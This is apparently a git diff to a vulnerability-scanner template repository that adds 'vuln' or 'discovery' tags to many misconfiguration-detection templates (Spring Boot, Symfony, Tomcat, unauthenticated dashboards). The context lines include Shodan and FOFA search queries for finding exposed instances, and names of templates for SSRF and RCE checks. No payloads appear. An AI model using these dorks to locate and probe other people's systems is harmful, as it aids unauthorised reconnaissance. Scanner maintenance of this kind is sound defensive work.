b/http/misconfiguration/springboot/springboot-scheduledtasks.yaml index ccce13daeca..df1530b612a 100644 --- a/http/misconfiguration/springboot/springboot-scheduledtasks.yaml +++ b/http/misconfiguration/springboot/springboot-scheduledtasks.yaml @@ -14,7 +14,7 @@ info: metadata: verified: true max-request: 2 - tags: misconfig,springboot,exposure + tags: misconfig,springboot,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/springboot/springboot-startup.yaml b/http/misconfiguration/springboot/springboot-startup.yaml index 57118deddba..9d1daede44d 100644 --- a/http/misconfiguration/springboot/springboot-startup.yaml +++ b/http/misconfiguration/springboot/springboot-startup.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true max-request: 2 - tags: misconfig,springboot,exposure + tags: misconfig,springboot,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/springboot/springboot-status.yaml b/http/misconfiguration/springboot/springboot-status.yaml index f6878a8ce4f..a38ab2668e6 100644 --- a/http/misconfiguration/springboot/springboot-status.yaml +++ b/http/misconfiguration/springboot/springboot-status.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 2 shodan-query: title:"Eureka" - tags: misconfig,springboot,exposure + tags: misconfig,springboot,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/springboot/springboot-threaddump.yaml b/http/misconfiguration/springboot/springboot-threaddump.yaml index 40553f2fa20..ffe21293c3a 100644 --- a/http/misconfiguration/springboot/springboot-threaddump.yaml +++ b/http/misconfiguration/springboot/springboot-threaddump.yaml @@ -9,7 +9,7 @@ info: - https://docs.spring.io/spring-boot/docs/2.4.11-SNAPSHOT/actuator-api/htmlsingle/#threaddump metadata: max-request: 2 - tags: springboot,misconfig + tags: springboot,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/springboot/springboot-trace.yaml b/http/misconfiguration/springboot/springboot-trace.yaml index d2872dd3200..cbc4e97655d 100644 --- a/http/misconfiguration/springboot/springboot-trace.yaml +++ b/http/misconfiguration/springboot/springboot-trace.yaml @@ -7,7 +7,7 @@ info: description: View recent HTTP requests and responses metadata: max-request: 1 - tags: misconfig,springboot,exposure + tags: misconfig,springboot,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/sql-server-report-viewer.yaml b/http/misconfiguration/sql-server-report-viewer.yaml index 3da7c5fd627..bf9aadb9a0b 100644 --- a/http/misconfiguration/sql-server-report-viewer.yaml +++ b/http/misconfiguration/sql-server-report-viewer.yaml @@ -15,7 +15,7 @@ info: vendor: microsoft product: sql_server google-query: inurl:"/Reports/Pages/Folder.aspx" - tags: misconfig,sql,report,exposure + tags: misconfig,sql,report,exposure,vuln http: - raw: diff --git a/http/misconfiguration/ssrf-via-oauth-misconfig.yaml b/http/misconfiguration/ssrf-via-oauth-misconfig.yaml index 4f6a80c58d2..6d16f93e45b 100644 --- a/http/misconfiguration/ssrf-via-oauth-misconfig.yaml +++ b/http/misconfiguration/ssrf-via-oauth-misconfig.yaml @@ -9,7 +9,7 @@ info: - https://portswigger.net/research/hidden-oauth-attack-vectors metadata: max-request: 1 - tags: misconfig,oast,oauth,ssrf,intrusive + tags: misconfig,oast,oauth,ssrf,intrusive,vuln http: - raw: diff --git a/http/misconfiguration/ssrpm-arbitrary-password-reset.yaml b/http/misconfiguration/ssrpm-arbitrary-password-reset.yaml index b34e312c11b..f6772987605 100644 --- a/http/misconfiguration/ssrpm-arbitrary-password-reset.yaml +++ b/http/misconfiguration/ssrpm-arbitrary-password-reset.yaml @@ -13,7 +13,7 @@ info: shodan-query: http.favicon.hash:-916902413 max-request: 1 verified: true - tags: ssrpm,intrusive + tags: ssrpm,intrusive,vuln variables: string: "{{to_lower(rand_text_alpha(5))}}" diff --git a/http/misconfiguration/struts-ognl-console.yaml b/http/misconfiguration/struts-ognl-console.yaml index e78c950c15b..c72d6603927 100644 --- a/http/misconfiguration/struts-ognl-console.yaml +++ b/http/misconfiguration/struts-ognl-console.yaml @@ -17,7 +17,7 @@ info: vendor: apache product: struts shodan-query: html:"Struts Problem Report" - tags: apache,struts,ognl,panel,misconfig + tags: apache,struts,ognl,panel,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/symfony/symfony-conflicting-misconfig.yaml b/http/misconfiguration/symfony/symfony-conflicting-misconfig.yaml index ec2c1b14121..80a385eb936 100644 --- a/http/misconfiguration/symfony/symfony-conflicting-misconfig.yaml +++ b/http/misconfiguration/symfony/symfony-conflicting-misconfig.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 1 shodan-query: http.title:"Symfony" - tags: misconfig,symfony,exposure + tags: misconfig,symfony,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/symfony/symfony-debug.yaml b/http/misconfiguration/symfony/symfony-debug.yaml index 5e674e27d36..59fe76d8170 100644 --- a/http/misconfiguration/symfony/symfony-debug.yaml +++ b/http/misconfiguration/symfony/symfony-debug.yaml @@ -15,7 +15,7 @@ info: vendor: sensiolabs product: symfony shodan-query: http.html:"symfony Profiler" - tags: symfony,debug,misconfig + tags: symfony,debug,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/symfony/symfony-default-key-rce.yaml b/http/misconfiguration/symfony/symfony-default-key-rce.yaml index 33788d2dedb..cc77c56e183 100644 --- a/http/misconfiguration/symfony/symfony-default-key-rce.yaml +++ b/http/misconfiguration/symfony/symfony-default-key-rce.yaml @@ -16,7 +16,7 @@ info: max-request: 12 shodan-query: http.html:"Symfony Profiler" verified: true - tags: rce,symfony,misconfig + tags: rce,symfony,misconfig,vuln variables: badsecretkey: 'ThisIsAlmostCertainlyNotIt' diff --git a/http/misconfiguration/symfony/symfony-fosjrouting-bundle.yaml b/http/misconfiguration/symfony/symfony-fosjrouting-bundle.yaml index e9fddcdb3b2..ea04cfd1862 100644 --- a/http/misconfiguration/symfony/symfony-fosjrouting-bundle.yaml +++ b/http/misconfiguration/symfony/symfony-fosjrouting-bundle.yaml @@ -11,7 +11,7 @@ info: verified: true max-request: 1 shodan-query: http.html:"symfony Profiler" - tags: misconfig,symfony + tags: misconfig,symfony,vuln http: - method: GET diff --git a/http/misconfiguration/symfony/symfony-fragment.yaml b/http/misconfiguration/symfony/symfony-fragment.yaml index f1073703aa5..45ad98bd60c 100644 --- a/http/misconfiguration/symfony/symfony-fragment.yaml +++ b/http/misconfiguration/symfony/symfony-fragment.yaml @@ -19,7 +19,7 @@ info: vendor: sensiolabs product: symfony shodan-query: http.html:"symfony Profiler" - tags: config,exposure,symfony,misconfig + tags: config,exposure,symfony,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/syncthing-dashboard.yaml b/http/misconfiguration/syncthing-dashboard.yaml index 5d427ede372..e7b6e9add8f 100644 --- a/http/misconfiguration/syncthing-dashboard.yaml +++ b/http/misconfiguration/syncthing-dashboard.yaml @@ -15,7 +15,7 @@ info: vendor: syncthing product: syncthing shodan-query: http.html:'ng-app="syncthing"' - tags: misconfig,syncthing,exposure + tags: misconfig,syncthing,exposure,discovery http: - method: GET diff --git a/http/misconfiguration/system-properties-exposure.yaml b/http/misconfiguration/system-properties-exposure.yaml index 1a8ce11c4b3..93ecf4b08b0 100644 --- a/http/misconfiguration/system-properties-exposure.yaml +++ b/http/misconfiguration/system-properties-exposure.yaml @@ -9,7 +9,7 @@ info: verified: true max-request: 1 shodan-query: title:"System Properties" - tags: misconfig,system,exposure + tags: misconfig,system,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/tasmota-config-webui.yaml b/http/misconfiguration/tasmota-config-webui.yaml index 08b29b289ec..d282c84b13b 100644 --- a/http/misconfiguration/tasmota-config-webui.yaml +++ b/http/misconfiguration/tasmota-config-webui.yaml @@ -15,7 +15,7 @@ info: vendor: tasmota_project product: tasmota shodan-query: title:"Tasmota" - tags: misconfig,tasmota,exposure,config + tags: misconfig,tasmota,exposure,config,vuln http: - method: GET diff --git a/http/misconfiguration/tcpconfig.yaml b/http/misconfiguration/tcpconfig.yaml index 670e6f5161b..1c8f78863d9 100644 --- a/http/misconfiguration/tcpconfig.yaml +++ b/http/misconfiguration/tcpconfig.yaml @@ -14,7 +14,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: config,edb,logs,misconfig + tags: config,edb,logs,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/teamcity/teamcity-guest-login-enabled.yaml b/http/misconfiguration/teamcity/teamcity-guest-login-enabled.yaml index 98cb5ec5397..b6b5b29a79c 100644 --- a/http/misconfiguration/teamcity/teamcity-guest-login-enabled.yaml +++ b/http/misconfiguration/teamcity/teamcity-guest-login-enabled.yaml @@ -20,7 +20,7 @@ info: shodan-query: http.component:"TeamCity" product: teamcity vendor: jetbrains - tags: misconfig,teamcity,jetbrains + tags: misconfig,teamcity,jetbrains,vuln http: - raw: diff --git a/http/misconfiguration/teamcity/teamcity-registration-enabled.yaml b/http/misconfiguration/teamcity/teamcity-registration-enabled.yaml index 109d5ee6d96..7bd8a0489e9 100644 --- a/http/misconfiguration/teamcity/teamcity-registration-enabled.yaml +++ b/http/misconfiguration/teamcity/teamcity-registration-enabled.yaml @@ -19,7 +19,7 @@ info: shodan-query: http.component:"TeamCity" product: teamcity vendor: jetbrains - tags: misconfig,auth-bypass,teamcity,jetbrains,intrusive + tags: misconfig,auth-bypass,teamcity,jetbrains,intrusive,vuln http: - raw: diff --git a/http/misconfiguration/teslamate-unauth-access.yaml b/http/misconfiguration/teslamate-unauth-access.yaml index 6a27981677e..79ee86d9ffe 100644 --- a/http/misconfiguration/teslamate-unauth-access.yaml +++ b/http/misconfiguration/teslamate-unauth-access.yaml @@ -15,7 +15,7 @@ info: product: teslamate shodan-query: http.favicon.hash:-1478287554 fofa-query: title="teslamate" - tags: misconfig,teslamate,unauth + tags: misconfig,teslamate,unauth,vuln http: - method: GET diff --git a/http/misconfiguration/thanos-prometheus-exposure.yaml b/http/misconfiguration/thanos-prometheus-exposure.yaml index 0a57ac05bbc..189878d6810 100644 --- a/http/misconfiguration/thanos-prometheus-exposure.yaml +++ b/http/misconfiguration/thanos-prometheus-exposure.yaml @@ -14,7 +14,7 @@ info: max-request: 2 shodan-query: title:"Thanos | Highly available Prometheus setup" fofa-query: icon_hash="29632872" - tags: thanos,prometheus,exposure,setup,misconfig + tags: thanos,prometheus,exposure,setup,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/thinkphp-errors.yaml b/http/misconfiguration/thinkphp-errors.yaml index 5564fdaa804..8375de827af 100644 --- a/http/misconfiguration/thinkphp-errors.yaml +++ b/http/misconfiguration/thinkphp-errors.yaml @@ -13,7 +13,7 @@ info: vendor: thinkphp product: thinkphp fofa-query: app="ThinkPHP" && title="System Error" - tags: thinkphp,misconfig,exposure + tags: thinkphp,misconfig,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/tiny-file-manager-unauth.yaml b/http/misconfiguration/tiny-file-manager-unauth.yaml index 70c36ee8870..58bef4dacaf 100644 --- a/http/misconfiguration/tiny-file-manager-unauth.yaml +++ b/http/misconfiguration/tiny-file-manager-unauth.yaml @@ -10,7 +10,7 @@ info: max-request: 1 shodan-query: title:"Tiny File Manager" zoomeye-query: app="Tiny File Manager" - tags: misconfig,filemanager,detect + tags: misconfig,filemanager,detect,vuln http: - method: GET diff --git a/http/misconfiguration/titannit-web-exposure.yaml b/http/misconfiguration/titannit-web-exposure.yaml index d23e7f08432..a928cf44264 100644 --- a/http/misconfiguration/titannit-web-exposure.yaml +++ b/http/misconfiguration/titannit-web-exposure.yaml @@ -8,7 +8,7 @@ info: verified: true max-request: 1 shodan-query: title:"TitanNit Web Control" - tags: misconfig,titannit,webcontrol,exposure + tags: misconfig,titannit,webcontrol,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/titiler-ssrf.yaml b/http/misconfiguration/titiler-ssrf.yaml index af282cb8aa6..1195db3822e 100644 --- a/http/misconfiguration/titiler-ssrf.yaml +++ b/http/misconfiguration/titiler-ssrf.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: html:"TiTiler" - tags: titiler,oast,obb,ssrf + tags: titiler,oast,obb,ssrf,vuln http: - raw: diff --git a/http/misconfiguration/tls-sni-proxy.yaml b/http/misconfiguration/tls-sni-proxy.yaml index ec86b81b944..23376cfe7c4 100644 --- a/http/misconfiguration/tls-sni-proxy.yaml +++ b/http/misconfiguration/tls-sni-proxy.yaml @@ -9,7 +9,7 @@ info: - https://www.bamsoftware.com/computers/sniproxy/ metadata: max-request: 1 - tags: misconfig,ssrf,oast,tls,sni,proxy + tags: misconfig,ssrf,oast,tls,sni,proxy,vuln http: - raw: diff --git a/http/misconfiguration/tolgee-api-anonymous.yaml b/http/misconfiguration/tolgee-api-anonymous.yaml index b54795915b7..dbbe3f522e6 100644 --- a/http/misconfiguration/tolgee-api-anonymous.yaml +++ b/http/misconfiguration/tolgee-api-anonymous.yaml @@ -12,7 +12,7 @@ info: max-request: 1 verified: true shodan-query: html:"tolgee" - tags: api,tolgee,misconfig,intrusive + tags: api,tolgee,misconfig,intrusive,vuln variables: string: "{{to_lower('{{randstr}}')}}" diff --git a/http/misconfiguration/tomcat-cookie-exposed.yaml b/http/misconfiguration/tomcat-cookie-exposed.yaml index 50baf6c6861..87693f9cfb1 100644 --- a/http/misconfiguration/tomcat-cookie-exposed.yaml +++ b/http/misconfiguration/tomcat-cookie-exposed.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true max-request: 1 - tags: misconfig,apache,tomcat,exposure + tags: misconfig,apache,tomcat,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/tomcat-directory-listing.yaml b/http/misconfiguration/tomcat-directory-listing.yaml index f147c4b407b..3d2faf08b8a 100644 --- a/http/misconfiguration/tomcat-directory-listing.yaml +++ b/http/misconfiguration/tomcat-directory-listing.yaml @@ -16,7 +16,7 @@ info: vendor: apache product: tomcat shodan-query: title:"Apache Tomcat" - tags: tomcat,misconfig,listing,kisa + tags: tomcat,misconfig,listing,kisa,vuln http: - method: GET diff --git a/http/misconfiguration/tomcat-scripts.yaml b/http/misconfiguration/tomcat-scripts.yaml index 70f53585a6d..373ce036e3b 100644 --- a/http/misconfiguration/tomcat-scripts.yaml +++ b/http/misconfiguration/tomcat-scripts.yaml @@ -14,7 +14,7 @@ info: cwe-id: CWE-200 metadata: max-request: 8 - tags: apache,tomcat,misconfig + tags: apache,tomcat,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/tomcat-stacktraces.yaml b/http/misconfiguration/tomcat-stacktraces.yaml index 4f5419c6791..8fa73c49a2b 100644 --- a/http/misconfiguration/tomcat-stacktraces.yaml +++ b/http/misconfiguration/tomcat-stacktraces.yaml @@ -14,7 +14,7 @@ info: vendor: apache product: tomcat shodan-query: title:"Apache Tomcat" - tags: misconfig,tech,tomcat,apache + tags: misconfig,tech,tomcat,apache,vuln http: - method: GET diff --git a/http/misconfiguration/traccar-settings-disclosure.yaml b/http/misconfiguration/traccar-settings-disclosure.yaml index 7b98a2e3354..9f8fdd3f466 100644 --- a/http/misconfiguration/traccar-settings-disclosure.yaml +++ b/http/misconfiguration/traccar-settings-disclosure.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: title:"Traccar" - tags: traccar,disclosure,unauth,misconfig + tags: traccar,disclosure,unauth,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/transmission-dashboard.yaml b/http/misconfiguration/transmission-dashboard.yaml index fb6aa3dcbb3..a726ebd6757 100644 --- a/http/misconfiguration/transmission-dashboard.yaml +++ b/http/misconfiguration/transmission-dashboard.yaml @@ -18,7 +18,7 @@ info: shodan-query: http.title:"Transmission Web Interface" product: transmission vendor: transmissionbt - tags: misconfig,transmission,exposure,dashboard + tags: misconfig,transmission,exposure,dashboard,discovery http: - method: GET diff --git a/http/misconfiguration/twonky-server-exposure.yaml b/http/misconfiguration/twonky-server-exposure.yaml index fe6a4233e4e..bf7a11f2a3d 100644 --- a/http/misconfiguration/twonky-server-exposure.yaml +++ b/http/misconfiguration/twonky-server-exposure.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 1 shodan-query: http.favicon.hash:-915768386 - tags: twonky,exposure,misconfig + tags: twonky,exposure,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/typo3-composer.yaml b/http/misconfiguration/typo3-composer.yaml index 6eb00b0ab2d..683f5d514b0 100644 --- a/http/misconfiguration/typo3-composer.yaml +++ b/http/misconfiguration/typo3-composer.yaml @@ -16,7 +16,7 @@ info: vendor: typo3 product: typo3 shodan-query: "X-TYPO3-Parsetime: 0ms" - tags: typo3,cms,exposure,misconfig + tags: typo3,cms,exposure,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/typo3-debug-mode.yaml b/http/misconfiguration/typo3-debug-mode.yaml index 5311877ade4..89213e41872 100644 --- a/http/misconfiguration/typo3-debug-mode.yaml +++ b/http/misconfiguration/typo3-debug-mode.yaml @@ -13,7 +13,7 @@ info: vendor: typo3 product: typo3 shodan-query: http.title:"TYPO3 Exception" - tags: typo3,debug,misconfig + tags: typo3,debug,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/unauth-apache-kafka-ui.yaml b/http/misconfiguration/unauth-apache-kafka-ui.yaml index 79ff6513083..3ce20edae83 100644 --- a/http/misconfiguration/unauth-apache-kafka-ui.yaml +++ b/http/misconfiguration/unauth-apache-kafka-ui.yaml @@ -16,7 +16,7 @@ info: vendor: apache product: kafka shodan-query: http.title:"UI for Apache Kafka" - tags: misconfig,apache,kafka,unauth,exposure + tags: misconfig,apache,kafka,unauth,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/unauth-axyom-network-manager.yaml b/http/misconfiguration/unauth-axyom-network-manager.yaml index d8cb95b325b..7a24f883301 100644 --- a/http/misconfiguration/unauth-axyom-network-manager.yaml +++ b/http/misconfiguration/unauth-axyom-network-manager.yaml @@ -9,7 +9,7 @@ info: verified: true max-request: 1 shodan-query: http.title:"Axyom Network Manager" - tags: misconfig,axyom,exposure,unauth + tags: misconfig,axyom,exposure,unauth,vuln http: - method: GET diff --git a/http/misconfiguration/unauth-celery-flower.yaml b/http/misconfiguration/unauth-celery-flower.yaml index e68e1cc7e1b..835802948a2 100644 --- a/http/misconfiguration/unauth-celery-flower.yaml +++ b/http/misconfiguration/unauth-celery-flower.yaml @@ -13,7 +13,7 @@ info: vendor: flower_project product: flower shodan-query: http.favicon.hash:-374133142 - tags: celery,flower,unauth,misconfig + tags: celery,flower,unauth,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/unauth-ckfinder.yaml b/http/misconfiguration/unauth-ckfinder.yaml index cb6472d79cf..26bb6849a2f 100644 --- a/http/misconfiguration/unauth-ckfinder.yaml +++ b/http/misconfiguration/unauth-ckfinder.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 1 google-query: inurl:ckfinder/ckfinder.html ext:html - tags: ckfinder,misconfig,unauth + tags: ckfinder,misconfig,unauth,vuln http: - method: GET diff --git a/http/misconfiguration/unauth-cyber-power-systems.yaml b/http/misconfiguration/unauth-cyber-power-systems.yaml index 817158438f2..575ea3b0f30 100644 --- a/http/misconfiguration/unauth-cyber-power-systems.yaml +++ b/http/misconfiguration/unauth-cyber-power-systems.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 shodan-query: html:"PDNU" - tags: unauth,cyber-power,misconfig + tags: unauth,cyber-power,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/unauth-esphome.yaml b/http/misconfiguration/unauth-esphome.yaml index 85314632688..d46326db905 100644 --- a/http/misconfiguration/unauth-esphome.yaml +++ b/http/misconfiguration/unauth-esphome.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: http.title:"ESPHome" - tags: esphome,iot,unauth,misconfig + tags: esphome,iot,unauth,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/unauth-etherpad.yaml b/http/misconfiguration/unauth-etherpad.yaml index 8f9da6a3428..86c0fb09b4e 100644 --- a/http/misconfiguration/unauth-etherpad.yaml +++ b/http/misconfiguration/unauth-etherpad.yaml @@ -14,7 +14,7 @@ info: vendor: etherpad product: etherpad shodan-query: http.html:"index.createOpenPad" - tags: etherpad,misconfig,unauth + tags: etherpad,misconfig,unauth,vuln http: - method: GET diff --git a/http/misconfiguration/unauth-fastvue-dashboard.yaml b/http/misconfiguration/unauth-fastvue-dashboard.yaml index d99a6376b77..f982c8fcb7a 100644 --- a/http/misconfiguration/unauth-fastvue-dashboard.yaml +++ b/http/misconfiguration/unauth-fastvue-dashboard.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 1 shodan-query: http.favicon.hash:-1117549627 - tags: panel,fastvue,unauth,misconfig + tags: panel,fastvue,unauth,misconfig,discovery http: - method: GET diff --git a/http/misconfiguration/unauth-kubecost.yaml b/http/misconfiguration/unauth-kubecost.yaml index 8918052a40b..6fc40dc659e 100644 --- a/http/misconfiguration/unauth-kubecost.yaml +++ b/http/misconfiguration/unauth-kubecost.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 shodan-query: title:kubecost - tags: misconfig,exposure,unauth,kubecost + tags: misconfig,exposure,unauth,kubecost,vuln http: - method: GET diff --git a/http/misconfiguration/unauth-ldap-account-manager.yaml b/http/misconfiguration/unauth-ldap-account-manager.yaml index 14c3a06abc7..348eba62a78 100644 --- a/http/misconfiguration/unauth-ldap-account-manager.yaml +++ b/http/misconfiguration/unauth-ldap-account-manager.yaml @@ -13,7 +13,7 @@ info: vendor: ldap-account-manager product: ldap_account_manager shodan-query: http.title:"LDAP Account Manager" - tags: ldap,misconfig,unauth + tags: ldap,misconfig,unauth,vuln http: - method: GET diff --git a/http/misconfiguration/unauth-mautic-upgrade.yaml b/http/misconfiguration/unauth-mautic-upgrade.yaml index ca7c85b9532..2f93f2e2124 100644 --- a/http/misconfiguration/unauth-mautic-upgrade.yaml +++ b/http/misconfiguration/unauth-mautic-upgrade.yaml @@ -9,7 +9,7 @@ info: verified: true max-request: 1 shodan-query: title:"Mautic" - tags: misconfig,unauth,mautic + tags: misconfig,unauth,mautic,vuln http: - method: GET diff --git a/http/misconfiguration/unauth-mercurial.yaml b/http/misconfiguration/unauth-mercurial.yaml index 4a3f192026c..56f6b78e86f 100644 --- a/http/misconfiguration/unauth-mercurial.yaml +++ b/http/misconfiguration/unauth-mercurial.yaml @@ -13,7 +13,7 @@ info: vendor: mercurial product: mercurial shodan-query: html:"Mercurial repositories index" - tags: misconfig,unauth,mercurial + tags: misconfig,unauth,mercurial,vuln http: - method: GET diff --git a/http/misconfiguration/unauth-opache-control-panel.yaml b/http/misconfiguration/unauth-opache-control-panel.yaml index ba1d161b17c..ac2c5cad529 100644 --- a/http/misconfiguration/unauth-opache-control-panel.yaml +++ b/http/misconfiguration/unauth-opache-control-panel.yaml @@ -9,7 +9,7 @@ info: verified: true max-request: 2 shodan-query: http.title:"Opcache Control Panel" - tags: misconfig,opache,exposure + tags: misconfig,opache,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/unauth-pactbroker.yaml b/http/misconfiguration/unauth-pactbroker.yaml index 00a5048a0a8..ab71efb1c17 100644 --- a/http/misconfiguration/unauth-pactbroker.yaml +++ b/http/misconfiguration/unauth-pactbroker.yaml @@ -17,7 +17,7 @@ info: shodan-query: 'title:"Pacts"' fofa-query: 'title="Pacts"' zoomeye-query: 'title:"Pacts"' - tags: pactbroker,misconfig,unauth,pacts + tags: pactbroker,misconfig,unauth,pacts,vuln http: - method: GET diff --git a/http/misconfiguration/unauth-redis-insight.yaml b/http/misconfiguration/unauth-redis-insight.yaml index 6d97b66bc06..03e04425139 100644 --- a/http/misconfiguration/unauth-redis-insight.yaml +++ b/http/misconfiguration/unauth-redis-insight.yaml @@ -12,7 +12,7 @@ info: verified: 'true' max-request: 1 shodan-query: title:"RedisInsight" - tags: redis,redisinsight,unauth,misconfig + tags: redis,redisinsight,unauth,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/unauth-selenium-grid-console.yaml b/http/misconfiguration/unauth-selenium-grid-console.yaml index 2e4a6b7c0b0..d4e35dffd40 100644 --- a/http/misconfiguration/unauth-selenium-grid-console.yaml +++ b/http/misconfiguration/unauth-selenium-grid-console.yaml @@ -12,7 +12,7 @@ info: metadata: verified: true max-request: 2 - tags: misconfig,unauth,selenium + tags: misconfig,unauth,selenium,vuln http: - method: GET diff --git a/http/misconfiguration/unauth-temporal-web-ui.yaml b/http/misconfiguration/unauth-temporal-web-ui.yaml index caef2566d33..9dab268a44a 100644 --- a/http/misconfiguration/unauth-temporal-web-ui.yaml +++ b/http/misconfiguration/unauth-temporal-web-ui.yaml @@ -18,7 +18,7 @@ info: shodan-query: http.favicon.hash:557327884 product: temporal vendor: temporal - tags: misconfig,temporal,unauth + tags: misconfig,temporal,unauth,vuln http: - method: GET diff --git a/http/misconfiguration/unauth-wavink-panel.yaml b/http/misconfiguration/unauth-wavink-panel.yaml index 568af1ac079..68359538332 100644 --- a/http/misconfiguration/unauth-wavink-panel.yaml +++ b/http/misconfiguration/unauth-wavink-panel.yaml @@ -9,7 +9,7 @@ info: verified: true max-request: 1 shodan-query: http.title:"Wi-Fi APP Login" - tags: exposure,wavlink,unauth,misconfig,router + tags: exposure,wavlink,unauth,misconfig,router,vuln http: - method: GET diff --git a/http/misconfiguration/unauth-zwave-mqtt.yaml b/http/misconfiguration/unauth-zwave-mqtt.yaml index 9db4747b162..33b3169ac1d 100644 --- a/http/misconfiguration/unauth-zwave-mqtt.yaml +++ b/http/misconfiguration/unauth-zwave-mqtt.yaml @@ -11,7 +11,7 @@ info: verified: true max-request: 1 shodan-query: title:"ZWave To MQTT" - tags: misconfig,zwave,mqtt,unauth + tags: misconfig,zwave,mqtt,unauth,vuln http: - method: GET diff --git a/http/misconfiguration/unauthenticated-alert-manager.yaml b/http/misconfiguration/unauthenticated-alert-manager.yaml index 4b68efc0f6a..32ffd5d84cb 100644 --- a/http/misconfiguration/unauthenticated-alert-manager.yaml +++ b/http/misconfiguration/unauthenticated-alert-manager.yaml @@ -12,7 +12,7 @@ info: vendor: prometheus product: alertmanager shodan-query: http.title:"Alertmanager" - tags: unauth,alertmanager,misconfig + tags: unauth,alertmanager,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/unauthenticated-glances.yaml b/http/misconfiguration/unauthenticated-glances.yaml index f91159d6da5..d7f7d0a41be 100644 --- a/http/misconfiguration/unauthenticated-glances.yaml +++ b/http/misconfiguration/unauthenticated-glances.yaml @@ -9,7 +9,7 @@ info: - https://glances.readthedocs.io/en/latest/quickstart.html#how-to-protect-your-server-or-web-server-with-a-login-password metadata: max-request: 1 - tags: exposure,glances,misconfig + tags: exposure,glances,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/unauthenticated-glowroot.yaml b/http/misconfiguration/unauthenticated-glowroot.yaml index ae2a9e2f39a..7917a5eb238 100644 --- a/http/misconfiguration/unauthenticated-glowroot.yaml +++ b/http/misconfiguration/unauthenticated-glowroot.yaml @@ -8,7 +8,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"Glowroot" - tags: misconfig,unauth,glowroot + tags: misconfig,unauth,glowroot,vuln http: - method: GET diff --git a/http/misconfiguration/unauthenticated-lansweeper.yaml b/http/misconfiguration/unauthenticated-lansweeper.yaml index 0bcf7a8181c..c01bb13e8fa 100644 --- a/http/misconfiguration/unauthenticated-lansweeper.yaml +++ b/http/misconfiguration/unauthenticated-lansweeper.yaml @@ -7,7 +7,7 @@ info: description: Lansweeper Instance is exposed. metadata: max-request: 1 - tags: lansweeper,unauth,misconfig + tags: lansweeper,unauth,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/unauthenticated-mongo-express.yaml b/http/misconfiguration/unauthenticated-mongo-express.yaml index ee24119dd5f..310e7cccfd8 100644 --- a/http/misconfiguration/unauthenticated-mongo-express.yaml +++ b/http/misconfiguration/unauthenticated-mongo-express.yaml @@ -15,7 +15,7 @@ info: vendor: mongo-express_project product: mongo-express shodan-query: title:"Home - Mongo Express" - tags: mongo,unauth,edb,misconfig + tags: mongo,unauth,edb,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/unauthenticated-netdata.yaml b/http/misconfiguration/unauthenticated-netdata.yaml index c131a98b3ff..477c9ebd005 100644 --- a/http/misconfiguration/unauthenticated-netdata.yaml +++ b/http/misconfiguration/unauthenticated-netdata.yaml @@ -9,7 +9,7 @@ info: - https://github.com/netdata/netdata metadata: max-request: 1 - tags: netdata,unauth,misconfig + tags: netdata,unauth,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/unauthenticated-nginx-dashboard.yaml b/http/misconfiguration/unauthenticated-nginx-dashboard.yaml index 1011b21796d..833f94218bf 100644 --- a/http/misconfiguration/unauthenticated-nginx-dashboard.yaml +++ b/http/misconfiguration/unauthenticated-nginx-dashboard.yaml @@ -10,7 +10,7 @@ info: metadata: max-request: 1 shodan-query: html:"NGINX+ Dashboard" - tags: misconfig,nginx + tags: misconfig,nginx,discovery http: - method: GET diff --git a/http/misconfiguration/unauthenticated-popup-upload.yaml b/http/misconfiguration/unauthenticated-popup-upload.yaml index 4d7f687a81e..fc6baca3d85 100644 --- a/http/misconfiguration/unauthenticated-popup-upload.yaml +++ b/http/misconfiguration/unauthenticated-popup-upload.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: edb,fileupload,misconfig,intrusive + tags: edb,fileupload,misconfig,intrusive,vuln http: - method: GET diff --git a/http/misconfiguration/unauthenticated-prtg.yaml b/http/misconfiguration/unauthenticated-prtg.yaml index 6e712ace964..fd82dda55c3 100644 --- a/http/misconfiguration/unauthenticated-prtg.yaml +++ b/http/misconfiguration/unauthenticated-prtg.yaml @@ -9,7 +9,7 @@ info: - https://www.exploit-db.com/ghdb/5808 metadata: max-request: 1 - 